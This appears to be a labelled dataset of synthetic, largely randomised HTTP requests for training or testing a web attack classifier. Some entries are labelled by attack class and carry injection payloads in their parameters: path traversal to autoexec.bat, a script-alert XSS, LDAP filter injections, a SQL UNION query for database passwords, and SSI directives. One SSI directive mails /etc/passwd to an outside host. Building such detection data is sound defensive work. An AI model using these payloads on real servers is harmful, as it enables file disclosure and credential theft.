Date: Sat, 15 Dec 07 24:42:44 GMT
ETag: W/"N0G51K5pUBajmD3E65Xy"
Expect: hbsstpl
From: aeeaqe@ea10ef.st
If-Modified-Since: Sun, 22 Jan 06 15:13:31 GMT
If-Unmodified-Since: Thu, 02 Feb 06 23:29:56 UTC
If-Match: "cR2Xp4dRowh8uBx"
If-None-Match: "Vbv0NPnXa7jdF6Jc@."
If-Range: Mon, 03 Jul 06 12:59:15 GMT
Max-Forwards: 91
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ooxa Emonh=aeiur
Authorization: Htha sdmr=ga6ato
Range: 986633-,-445,64-7061
Referer: http://wmeti.be/snene/isv92/o9Nzrg/beety.cgi
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.2 (X11; U; Unix 9.7; I6-ms; rv:7.9.7) Gecko/98651948
UA-CPU: 68000
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 190x1907
Via: FTP/1.9 www.iniX.jpeg
Transfer-Encoding: compress
Upgrade: eEeZe/7.4, Zmitao/2.6, hfrDo/5.0
Warning: 949 173.10.111.220:0 "1Outi0Ptecll" 
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 738264285065396
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 14008
Start - Id: 897
class: Valid
GET /hTpehutayuaa3tl.cfm?tpNcrersae3sma=oty8ye3romtr5se HTTP/1.0
Host: www.anmlwotf7.cz:144
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.3
Accept-Language: *;q=0.3
Cache-Control: max-age=658
Client-ip: 171.41.47.153
Cookie: n6aesueSz4=92;7rpcbrudjN=eehxyxoa;cedlea=ospnesolog
Cookie2: $Version="968"
Date: Fri, 06 Oct 06 12:30:03 UTC
ETag: "33HcNbBNC1HdtlHTdYe"
Expect: Lgje=nuts3no;erg4e=dYSaT7el
From: Ou2tor@taoe.fr
If-Modified-Since: Tue, 12 Jul 05 03:08:30 UTC
If-Unmodified-Since: Sat, 04 Apr 09 12:30:35 UTC
If-Match: "vbUp.BGZGYWv6gJAF"
If-None-Match: *
If-Range: Thu, 03 Jan 08 14:22:07 GMT
Max-Forwards: 93
MIME-Version: 0.4
Pragma: t=7vmh9
Proxy-Authorization: Digest uri=http://apeo.fr/nenaohpr/utnBni/Eeor/utbwemst.dll
Authorization: Digest nc=4b75ce0d
Range: 24-
Referer: /dsnt/yeoA8ef/saounltd/zaEfihx/a0htcasE.gif
TE: deflate,deflate;q=0.1
Trailer: If-None-Match
User-Agent: moA1rhh (sfTklwE_M; iTo_nNz; mZ5u_.x2; lo8dlb; r@Q2BwD)
UA-CPU: 68000
UA-Disp: 026,040,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 848x029
Via: 4.5 www.aetsl.gif, 4.1 www.rre5.jpg
Transfer-Encoding: tnaoii; ybio=Tde1
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 467 www.00teeo.htm "rapsHi" 
X-Forwarded-For: 145.115.206.7
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 897
Start - Id: 16493
class: Valid
GET /9s9_DXIeT6jM-8x1sa4v/d6fbeaAcsss4uuysoe/P.KPyACWnph-fhtpasshavingD/aIreyN7Stsest8/pmruaLr2d4hhnanmlea/8HwGzx3BuXQzfY/hULe_aU05TOhrPYfKo_r/r8ehltnnElzaalsp0tj/updReccvFg/nF9Z1ns38mA/Wbo/gRsEsqo8tgiWfithsta.jpg?wnA4ezhn=0%3Dyi7goiaynrperluh&i0ocsss=9600&oL=588281&BjwewPa=shWV2r1U&7ooEelstuScocew=tn7%25&rid=fdtisdc&x4qYsoa=8702832&ijansEbadnYdaaw=9LwYS&sisrmHo=91656&cmi=yyrerexadr&5kPmwq=htysrl&jpdewr7=sSS1ObN&iabdtqyoewgemoo=412&fOiaiseIqdat=4321429 HTTP/1.0
Host: 173.191.23.244:900
Connection: u0ne
Accept: */*;q=0.2
Accept-Charset: windows-1257;q=0.8, x-mac-turkish, windows-1253, x-mac-greek
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: 6y=dvnpuOe
Client-ip: 169.242.48.148
Cookie: cz=ysi:teiha2dsTr;Tcla40ihuJcc4=n;d3vkinTpvraE=771518490;iyaamdTarHapyE=oSkaeltd
Cookie2: $Version="42"
Date: Thu, 23 Mar 06 14:07:18 CET
ETag: W/"i2L09a-ha44vCPnqkJ"
Expect: lnoe=7sh5
From: ceErcs@l2xistettd.st
If-Modified-Since: Sun, 13 May 07 16:24:09 GMT
If-Unmodified-Since: Wed, 18 Oct 06 09:06:42 GMT
If-Match: *
If-None-Match: "EiKDs5ccVoazRNmNs6"
If-Range: "Q8kBuqOzsDh5bpPy6g"
Max-Forwards: 3
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: NTLM bWNoUnNhYm9udUliZWRzc2FhMGFzdHRuRTZtZHdyN2FkdUJ5TmVld3hvcnVV
Range: 90-3929,2123-,048886-
Referer: http://www.f9apeEt.net/onsinrt.ace
TE: gzip;q=0.0,trailers
Trailer: Authorization
User-Agent: wtErxJ9 http://www.niio.net
UA-CPU: StrongARM
UA-Disp: 456,224,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 564x568
Via: gFhett/3.4 www.ire4.css, 0.5 4.105.224.247, 4.1 www.hkTwi.css:686
Transfer-Encoding: ij0sh; ErruT1vm=Ea8btss
Upgrade: Hpeiat/6.9, mtteT/6.3, ehna/6.5
Warning: 207 www.yt8hi.jpg "zo0ZOhmtman5Setysjq" "Sat, 08 Oct 05 12:20:47 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 9767080294683839
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 16493
Start - Id: 36042
class: PathTransversal
GET /childIKeFT/dchild/rthcoaOl/ijNis6Yqf9XMrktQY0H/tDhrihv.jpeg?eewccarqhhapra=rbff&VYDgFTc1=t4qxlikeotNenwus&a7arxnhtsm=ebgodah&bbvbscriptHhRf5QLOz=9314&4tPhttplsi=eeImlhonRr&ieshuoky=bwYfbUX3Xln&miett=%289hsttn%24oalludi&SW0JdhL0A=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&dvo8foutioe=weiEid&Rnhe3fabrmaG=5ls&juFhXHQi0PhM=d-20Rk52A%40Y&uru0dVrqptnreh=hcopye&kesEnmo=eht&ir=sform HTTP/1.0
Host: www.NSlie.be
Connection: close
Accept: */*;q=0.4
Accept-Charset: koi8-r;q=0.8, iso-8859-6;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=691
Client-ip: 59.23.8.230
Cookie: rwnvrnSscanrr2s=otfieohti;TYJ=eaeiifat$N;min=6BnctHx8W
Cookie2: $Version="0"
Date: Wed, 12 Oct 05 07:23:19 CET
ETag: "n-8upU_gq4.C0q_yXO"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Sun, 09 Oct 05 06:14:06 CET
If-Unmodified-Since: Tue, 29 Aug 06 24:10:42 CET
If-Match: "cpJg7Avs94O@02kroeWj"
If-None-Match: *
If-Range: "C7VLLCUl8Gc4SXt5"
Max-Forwards: 6
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM cmljbm90c3Ntd2Vtc2lpdGRjYXNlaHRvNG1tb2h0QXNzZXNyaG9zdHJkZHQ=
Range: 709-485
Referer: /3sl0/8rhedp/auteef2/nipea.gif
TE: trailers
Trailer: If-Match
User-Agent: leentase
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 2.7 www.aunei.gif
Transfer-Encoding: nmmute; ihiem6cs=aes3ofsm
Upgrade: tztr/1.1, esid/8.4, 6ktsdr/4.4, Ipqst/0.4
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36042
Start - Id: 7304
class: Valid
POST /eN4-/aleLJ75jAy@CwU-/88uTns9efoI/fpbohsgtihs3nLsj/a8HbetweenxuFuconnecta.C1H/pO4/1nNeolatazsrkslt/xfYtBn_/volon37tl3EldtT/p_/zZVX.aspx? HTTP/1.0
Content-Length: 295
Content-Language: Zoaiu
Content-Encoding: deflate
Content-Location: http://www.kasds.com/eotl4Om.htm
Content-MD5: T0lzTnFhbmhudDFrYmFtaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Mar 10 19:10:57 GMT
Last-Modified: Tue, 17 Jun 08 03:38:39 UTC
Host: 223.227.187.78
Connection: aosafe
Accept: */*;q=0.8
Accept-Charset: x-mac-ce;q=0.6
Accept-Encoding: 
Accept-Language: sTnsslst-enKdlg, 5tdmETme-ztxesl;q=0.7
Cache-Control: no-cache
Client-ip: 17.44.116.170
Cookie: tlhhy=doaeeu;ht=ezwend=1]openQn;mW.Y@Uchild=981623;tyheheitea=m ridhh0we;rfPW=017885048
Cookie2: $Version="1"
Date: Mon, 22 Oct 07 09:01:33 UTC
ETag: W/"0fipGGrcEvEbFaJ-fJ"
Expect: 100-continue
From: ha4h@ntbt8vhFn.cz
If-Modified-Since: Mon, 06 Dec 04 13:57:54 GMT
If-Unmodified-Since: Sat, 19 Jan 08 21:58:21 UTC
If-Match: "1lxaL3akVApoenWz_"
If-None-Match: "yY4H3ihB.Fdc@-1p2Uw"
If-Range: "rxoNJnBIeWJLblGT3i"
Max-Forwards: 1
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: rlbrar tTa3tcon=imcivns
Authorization: Basic c2JFYmFlOm8xamVzc2Ry
Range: 843670-7300,78-
Referer: /Aae9e4i.bin
TE: trailers,trailers
Trailer: Trailer
User-Agent: igK1@H@ http://www.4d3nlhtj.ch
UA-CPU: 68000
UA-Disp: 4520,707,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1302x7380
Via: FTP/9.1 www.to9oIog3.js, 4.7 216.228.174.109
Transfer-Encoding: gzip
Upgrade: Pcr/6.7, asmrbh/9.1, ayi/9.1
Warning: 465 193.0.29.240 "9tdbganttoetamdoth" 
X-Forwarded-For: 28.214.132.150
X-Serial-Number: 35067124458
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ika2tohf5eeo=oev2&lsisexe9lhnsi=23319&htbds=12254&ci2m=je&j.linkcR8@zlibU=bIRgs&.XTivJ_dR9F%u=hddshutdowniframewSia&Nchild-f7FBjD=mtl0aiframe59gtt+7n%7CR+einputS&lhisri=ttsncdp&nenrTiasxcos7=17874&7aew3umbGe=passthruOrInbhtpasshbgsoundei&PbinoptB9=%5Bqsunullaccess_log-&yim85lSeoista=e7group+byn

End - Id: 7304
Start - Id: 48118
class: XSS
GET /XKZVH7O/yebdhozeacgodpokhlc/ou5Eeys/moGT7oubeato/x_/h3_kno7avu/mtf/3aatiiGc7c8air8/e8heibesltpbyo/nBwMJ5UJWg5ZLi/lcsjrvono2edlio9Icd3/oYN68Q@D.nsf?7pJNcozhtacces-M=hlQ50Om&execkfopenzUMunionCQ=eSC&-AuP=hoo+E&Rin=%3C%3Cscript++%3E%5Balert+%28%27ii8rhr%27%29%3B%5D%3C%2Fscript%3E&eenthirt=Bsn5wsHs&94documentlformpdeleten8BG=hntuimeSd&v1hnaneooEr=97059 HTTP/1.0
Host: 57.141.114.205
Connection: close
Accept: image/gif;q=0.8, video/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=7438
Client-ip: 228.184.243.149
Cookie: 4aue2n7Oix=5oaq;selmbohtseeed=yHrpRIVLIAW
Cookie2: $Version="832"
Date: Tue, 07 Jun 05 14:01:11 GMT
ETag: W/"wY2g.ylHPrDD1qK1A"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Mon, 15 Mar 04 09:33:52 GMT
If-Unmodified-Since: Sun, 05 Sep 04 13:26:50 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 16 May 05 19:59:13 UTC
Max-Forwards: 302
MIME-Version: 3.4
Pragma: 4eenio=tdfkms
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 223086-98
Referer: http://ycett.gov/Iteh4/eyrhelmx.gif
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.4 (X11; U; SunOS sun4u 4.6; tN-ra; rv:9.7.1) Gecko/52170099
UA-CPU: 68000
UA-Disp: 367,260,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6001x2247
Via: 1.0 145.243.65.117, HTTP/0.3 109.41.215.3, 1.0 61.82.74.170:8557
Transfer-Encoding: identity
Upgrade: paleei/6.9, pyefh/6.3, aeu/0.2
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 72.155.7.72
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48118
Start - Id: 38913
class: LdapInjection
GET /srCtHjtrc6ih0a/aeca/3D/yweicpsddoegsne/KovCb1l/RtM9nnt7edq/ueiIeyhleets.mdb?vWgmzrbtrnrth9i=de5fE&hteageMcs=fa5imhc&otok=pTZV&yoptFZVP7=syiuT2onmar77FTs&sFt=on&l0Acvwtaheii=doijeivi&eubhxu=%29++%28++++%7C%28displayName%3Dhad*%29+%28name%3D++had*++++%29%28+++mail%3Dhad*%29&oel=ogOlt&tae4ycrle7hstni=jkxteixt&Syniealmdee=dksnnetcatcXpi%3Dseei HTTP/1.1
Host: www.spyljn.de
Connection: vstt
Accept: image/*;q=0.1
Accept-Charset: x-mac-icelandic;q=0.7
Accept-Encoding: 
Accept-Language: oe-etwejeu, 3diS-x
Cache-Control: no-transform
Client-ip: 28.220.202.244
Cookie: _CWaDK=Rla;iAhdeitrUik=8
Cookie2: $Version="45"
Date: Sun, 08 Jan 06 21:49:04 UTC
ETag: W/"E8jHF1YpjxHTbtDDxA"
Expect: 100-continue
From: neenu@alestrhlsH.gov
If-Modified-Since: Mon, 02 Jun 08 13:29:09 GMT
If-Unmodified-Since: Sun, 20 Aug 06 09:22:44 UTC
If-Match: "tPJS-._P.Hq9OBZvSK"
If-None-Match: "L7CN2SfNtJQlPfAas."
If-Range: Mon, 25 Feb 08 19:37:38 GMT
Max-Forwards: 607
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: hgeet tYei=R5lh
Range: 979-,2-1
Referer: /cyeron/sgteoafd/rrww146e/ir6dski.aspx
TE: chunked;q=0.6
Trailer: Range
User-Agent: Mozilla/7.7 (compatible; MSIE 8.9; Solaris; m1imtr)
UA-Disp: 982,9974,16
UA-OS: Win95
Via: 6.7 113.233.112.39:36875, FTP/1.4 www.fcercqe.css
Transfer-Encoding: gzip
Upgrade: toues/6.2, Lrne/8.5, oec5E/9.4, eyhe/5.1, eneaoo/3.9
Warning: 239 www.vyh2ooi.js "ghiwstugdquhncr" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38913
Start - Id: 29136
class: Valid
GET /adetiti8tirr/R2xrHwfmJTCpassthru/EoEti7/8lalil8Oscesxedmnis.cgi?t8cstmn1isoorn=dfsns&envi7etee=lFxzjyEGuZ&EOBCqLPw.L=9486763&retp=s4Q-aRWba&hrisaor=qgG_&joc=8102&gron=54 HTTP/1.1
Host: 5.83.103.53
Connection: 3i15nr0
Accept: */*
Accept-Charset: iso-8859-2, x-mac-chinesetrad, euc-tw, ks_c_5601-1987
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: viem='pugg'
Client-ip: 186.234.179.68
Cookie: eaeiTeMsety=rjss;asidhS= r:l;s_Fhlxr8u=ohz@a
Cookie2: $Version="429"
Date: Sun, 20 Dec 09 11:50:09 CET
ETag: W/"5tyi6i@@GVLMdq_M"
Expect: 100-continue
From: 9tlsAera@gi2n.org
If-Modified-Since: Wed, 26 Mar 08 13:22:31 GMT
If-Unmodified-Since: Fri, 29 Dec 06 19:24:51 UTC
If-Match: *
If-None-Match: "DSD5PfRz6Q2olVde"
If-Range: Fri, 13 Mar 09 16:00:28 GMT
Max-Forwards: 3473
MIME-Version: 6.1
Pragma: 5s=ttjf
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: Digest uri=http://www.dnkSuN.uk/nt58rt/xrnaaid.doc
Range: -6
Referer: http://www.srNdiym.fr/t2ot/icaim.jpg
TE: trailers
Trailer: User-Agent
User-Agent: uJe4eemhxiefa
UA-CPU: MIPS
UA-Disp: 112,924,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 466x304
Via: HTTP/2.8 167.173.188.174
Transfer-Encoding: compress
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 15.219.134.176
X-Serial-Number: 1881707
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29136
Start - Id: 37279
class: LdapInjection
PUT /ReIr7E0QiTRgs/na1d4t/hg0/mT8NXrUEQPCRirikjrs.shtml? HTTP/1.1
Content-Length: 275
Content-Language: NemEiwa,i,re
Content-Encoding: gzip
Content-Location: http://www.oRfmLlh.gov/p2sI9.bin
Content-MD5: dG5hZWs4dXNlZTV0NWdjZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 16:06:40 GMT
Last-Modified: Wed, 16 Apr 08 22:27:14 UTC
Host: 133.132.104.100:77
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: ")(targetfilter=(o=NetscapeRoot))
Accept-Language: lonx8-y, EIwN-ahioty;q=0.2, Ujr42rn3-ormn
Cache-Control: no-store
Client-ip: 25.97.10.82
Cookie: rowancmAhecset=881850958
Cookie2: $Version="4"
Date: Sun, 01 Mar 09 17:42:53 GMT
ETag: "yuh2sJ9LeKM1-CyOmz3"
Expect: 100-continue
From: uAoeEcF@bauipcb2x.fr
If-Modified-Since: Tue, 02 Nov 04 05:16:04 UTC
If-Match: "m-bNPi9tqD9qSf7vIg"
If-None-Match: "4jbDnZOHPA3X_Nem0"
If-Range: "FJhG62oiZNWFtJwvyH5"
Max-Forwards: 93
Pragma: sautY6e='apoo'
Proxy-Authorization: h0o5 os2gn=erur0
Authorization: plchry nort=njtshs
Referer: /thdit6.aspx
Trailer: TE
User-Agent: Mozilla/8.1 (Windows; U; Windows NT 3.8; wk-jg; rv:8.7.1) Gecko/37273010
UA-Disp: 2933,1211,32
Via: 3.2 50.250.113.169, 3.0 10.74.206.105
Warning: 883 www.fRose.tiff "esne" "Sun, 08 Jun 08 18:40:43 UTC"
X-Forwarded-For: 62.116.110.58
X-Serial-Number: 037823

sluetedbs9o=892767216&h3thoEelan=3927360&lbrls8rxoErEfs=tnie&riEiteoHshc=9126083&A0=tjeimgo&edAsfEeieten=7&otednr8tThSOlt=t5jahmngedoi&scepqGohh1a=h&etwfateTHtrobwu=n1cxzh&yanplfm1x=eo59mYG_Z&he=778&iLcS=6_yKNCw8knX&optmwetRst=etthttptSsodeletezee&3pifamhes=51069607&sErh=119

End - Id: 37279
Start - Id: 10504
class: Valid
GET /h6rb/itthdlihao1tn9id/hTsahr/X3Am/weeleTvotiwreetss.jpg?hNatrooagmhtduu=4&yv0bp=799047557 HTTP/1.1
Host: www.iDfwjo.cz
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 0i788a-sl8lmonk, thuytii-asf7t;q=0.1, iGacar-Enru;q=0.8, ejuih-dsn;q=0.9
Cache-Control: no-store
Client-ip: 166.143.94.45
Cookie: e5eqoecsJn=cut83etceenNe;smo=d;ott5arishse=sn%ug;UlvhttpslXh.T=hrl$)6>o6
Cookie2: $Version="721"
Date: Thu, 25 Jun 09 13:21:51 UTC
ETag: "F@@B-GfETVh0gP@mfnDd"
Expect: 2gTdo
From: Po3inu1@xey4eI7tu.fr
If-Modified-Since: Thu, 14 Feb 08 21:35:37 CET
If-Unmodified-Since: Sun, 22 Jun 08 17:38:33 GMT
If-Match: "2X@baCh9o78ABXUV6"
If-None-Match: ".W8t-0mLugb5RSBCk"
If-Range: "2Fllv8RtLyTqBNjW4"
Max-Forwards: 8
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: Basic UnRvdjpnbjZIdHBkdQ==
Range: 29-
Referer: /egdfmBes/rnzmr/anhdidgt.pl
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: dmrhrnrzr/2.0.5
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4657x757
Via: eA9mLi/7.9 www.iIeEyp5t.css
Transfer-Encoding: identity
Upgrade: hpr/1.7, 2wn/2.6, lso/0.7
Warning: 364 17.253.249.140 "d4vHRriaUr2lxnus5tt" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 98147817279
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10504
Start - Id: 39949
class: SSI
GET /eblfiKz94mochaQu/aLAWswvBEGt/3LP_pAZ9jT7iYW8Bu/d8a1b8fvSYzRisr1RqH.bin?ey1=opai&te=%3C%21--%23exec+++++cmd%3D%22%2Fbin%2Fmail+++++sHyhjgShrf.com++%3C++++%2Fetc%2Fpasswd%22--%3E&y4tinnfo=51376401 HTTP/1.0
Host: 56.79.207.58
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: teln-4ssinDai
Cache-Control: no-store
Client-ip: 185.200.165.200
Cookie: rndIibdTrs=l=7
Cookie2: $Version="983"
Date: Sun, 12 Aug 07 05:33:01 GMT
ETag: "PS29fi3gmBioRy@5j4kl"
If-Unmodified-Since: Tue, 19 Sep 06 21:02:13 GMT
If-Range: *
Pragma: saoro5=tet
Proxy-Authorization: Digest response="ac4BeDAbEcd7D693f5c14DA2968662dc"
Authorization: NTLM M2pRZXhzc3BvbWphYXIxb25ncXZyODFkaGR0M3lkaW5wbGU=
Referer: http://oaeio.de/cn0ets/ce4oc/okne/diGw8e.mspx
TE: trailers
User-Agent: toseersl
Warning: 823 178.216.83.192 "Eiiayqjoilesatoelh" 
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39949
Start - Id: 2088
class: Valid
GET /teeFt8TtaEazq2st/ZPr_v0Kjz/hfHapy/73sea8Retohdswhron7/rdDklp4gOThTgCqsXl-/ycBtvHZKdu2/an0tlqtitmhn9v.msf?iOEe0x9nInorin=8766&TThUeuxYO=sdrtnwedo&rei=1&tter=o%28yuqDt&rsuNexec8xAhttpsv=473&nsY4ir=eaqin0aphp0dfh&ctohslcotEdftnr=updateeinsertunesife%3F%5Dns&ynlmees=xsami%28&_b8VZT.=aeeTs7a%3Fa&ae=e2%27%26ne0%3Eits&infromMexec@=l2f8G.or1ClO HTTP/1.0
Host: 210.77.196.152:4
Connection: keep-alive
Accept: audio/*, text/*, text/*
Accept-Charset: cp-936;q=0.3, windows-1255, gb2312
Accept-Encoding: identity;q=0.0, compress
Accept-Language: *;q=0.6
Cache-Control: min-fresh=6821
Client-ip: 189.41.152.51
Cookie: UmeRnwl=67297;WbHFgpositionZ6e4=e25mc1BCHgI;lTLaeEyol=66983263
Cookie2: $Version="329"
Date: Fri, 21 Apr 06 03:48:12 CET
ETag: W/"GbiGXpWdtDauJ0OzWwS"
Expect: 0raee
From: Iosu@aert5hd.ch
If-Modified-Since: Sat, 21 Jan 06 17:08:16 GMT
If-Unmodified-Since: Wed, 22 Dec 04 22:58:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 19
MIME-Version: 0.9
Pragma: UcNsttEs=oesn
Proxy-Authorization: Basic bDU0RTVvcjphZWEwdA==
Authorization: ncDl atib=kgsamh
Range: -0,-85855,759632-
Referer: /owinnr/hhdmane/heeulea/4vrIio.mpg
TE: trailers,gzip
Trailer: TE
User-Agent: Mozilla/8.8 (compatible; Konqueror/5.2; Win 9x; rssoGpi2oa; gheiroeite; nn7aa)
UA-CPU: StrongARM
UA-Disp: 4115,383,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9666x5160
Via: 2.2 www.ywiLTt.html, 6.1 215.102.32.211, FTP/3.3 www.rezdsirw.png:38
Transfer-Encoding: identity
Upgrade: yq8/2.8, eehttw/5.0, dkosox/1.5, escije/5.1, snhtg/0.5
Warning: 818 177.52.40.0:7 "eese0qtmam" "Thu, 12 Nov 09 18:55:16 GMT"
X-Forwarded-For: 132.82.181.214
X-Serial-Number: 0933416903549
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2088
Start - Id: 40442
class: SSI
GET /kAX76gcaV/ceaegiio/alN2QxFc5igVLr-g/sohsdhaahrp2lt/russisnah0ptx.shtml?nU_l=%3C%21--++++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&emaeodldSed=313&OhPB_6LL=n%3C&fs5lihaexsudhy=i%26%29%3DNkh1lOv8su%29&ach13thdrgtn=i3rjbUeee HTTP/1.0
Host: www.Anrojhtiis.biz
Connection: close
Accept: video/*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, compress, gzip, compress, gzip;q=0.1
Accept-Language: qeE-dothunek;q=0.3, ey8-tgH, kamq-ombrct
Cache-Control: min-fresh=8685
Client-ip: 128.123.101.76
Cookie: ikry71rli=peoma3eEcf4leb
Date: Thu, 06 Jul 06 21:14:04 GMT
ETag: W/"w_7cEQg3_Tkt1w70Xs"
Expect: 100-continue
If-Unmodified-Since: Wed, 15 Nov 06 03:21:44 GMT
If-None-Match: "@EO4WXr6dVVvBAVQgOF"
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 2775
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: rwn3u idctraIi=sRc7
Authorization: Basic dmpzb2k6YmlldGFQ
Range: 53605-7014
Referer: http://iely.de/as4rioti/igeteuf/awqo.php
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.5 (compatible; neuhtmimc; Solaris; ioelcnC; xsfLss; slra9rb)
UA-CPU: x86
UA-OS: Windows 95
Via: HTTP/8.5 237.208.218.3:41
Transfer-Encoding: compress
Warning: 424 www.ivstiAcN.shtml "Koasse" 
X-Forwarded-For: 211.36.21.124

null

End - Id: 40442
Start - Id: 41833
class: SqlInjection
GET /ayshOutstphnpN/hrtrshlpiE9/didjB./hnahhjieie/neaetx2tnnhwpUiaszr/PY55-1h4/dCZWWn3XK6FypJcI0Vsk/sLbIfrvlsgooo/1jFkz/sUlnseo6lA5r375me.aspx?rs8hwgApc=22&aqtfeauNfS=N%40ptueosscicEnn&TeWmKctd0iEn=%27union+select+PASSWORD+from++++DBA_PASSWORD%3B--&tIasytmaroCbpa3=roLtTzfl&ec2=7136880&.Z0i2OFGz=+usid++t%3A%7En5&9RosTacblO=c2WTl266&u0ieutmeasrg=yinnb HTTP/1.0
Host: 91.131.88.108
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: IicT6de-te8iN7;q=0.8, dGAtI-tylL, 5oTni-d;q=0.6
Cache-Control: no-transform
Client-ip: 196.90.56.27
Cookie: H1uASvO=5658170;otbginddm7es=4;autoexecLRIIP3winntmail=nY8JU;DgfQk1n5a=8404
Cookie2: $Version="58"
Date: Wed, 24 Oct 07 02:50:24 CET
ETag: W/"sEO6-Hh4WcNew12P"
Expect: 3hnAo
From: wIdO@lerc.gov
If-Modified-Since: Tue, 20 Dec 05 08:55:46 GMT
If-Unmodified-Since: Sun, 14 Mar 10 16:37:45 UTC
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "a9kd1k72KCg5uAD"
If-Range: "yPkp7d0f8_yExhrUxI"
Max-Forwards: 5
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: NTLM dDBtTDh5Z2hyQmFibWlzZWxzYmF0T3lkYXhweW5yb2k0Yg==
Range: -0842
Referer: http://www.twet.ch/eyepgeoe.pdf
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: i4Py8sFN http://www.orieE.gov
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5914x483
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: gzip
Upgrade: 7r8/5.9, eevr/0.1, escfA/5.5, itqIta/3.3
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 80.139.161.110
X-Serial-Number: 431124702375
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

